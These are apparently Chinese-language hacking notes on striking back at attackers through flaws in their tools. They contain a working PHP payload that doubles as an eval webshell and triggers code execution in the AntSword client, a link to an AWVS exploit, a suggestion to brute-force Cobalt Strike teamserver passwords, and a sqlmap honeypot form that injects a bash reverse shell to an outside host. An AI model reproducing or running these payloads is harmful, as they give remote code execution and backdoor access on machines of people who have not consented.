蚁剑 <=2.0.7 可以RCE的漏洞 https://github.com/AntSwordProject/antSword/issues/147
被发现另外一枚可以RCE的漏洞 https://github.com/AntSwordProject/antSword/issues/150
Payload:
<?php
if(strlen($_POST[1]) == 153){
preg_match_all('/echo "(\\\\w+)";/i', $_POST[1], $mat);
$profix = $mat[1][0];
$suffix = $mat[1][1];
echo $profix;?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Hello World!</title>
</head>
<body>
<h1>Hello World!</h1>
<p>This window does not have access to node bindings.</p>
<pre>process: <script>document.write(process)</script></pre>
<script>
window.open('data:text/html,But this one does! <br><pre>process.cwd(): <script>document.write(process.cwd());const {spawn} = require("child_process");spawn("open",["/Applications/Calculator.app"]);</scr'+'ipt></pre>');
</script>
</body>
</html>
<?php
echo $suffix;
}else{
eval($_POST[1]);
}
awvs 10 直接利用exp,等待对方扫描自己,即刻上线。exp下载地址:https://github.com/dzonerzy/acunetix_0day
cobalt strike
3.5版本teamserver有RCE漏洞
可以爆破teamserver密码,然后得到黑客攻击的其他傀儡机。
sqlmap
构造特殊的get或者post注入点来等待攻击者使用sqlmap扫描,例如下图,将get请求中的一个参数的值设置为lsl,倘若直接改成反弹shell的代码即可反控对方机器。
post利用方式:
<html>
<head>
<title> A sqlmap honeypot demo</title>
</head>
<body>
<input>search the user</input>
<form id="myForm" action="username.html" method="post" enctype="text/plain">
<input type='hidden' name='name'value='Robin&id=4567&command=shell`bash -i >&/dev/tcp/192.168.xxx.xxx/2333 0>&1`&port=1234'/>
<input type="button"οnclick="myForm.submit()" value="Submit">
</form>
</body>
</html>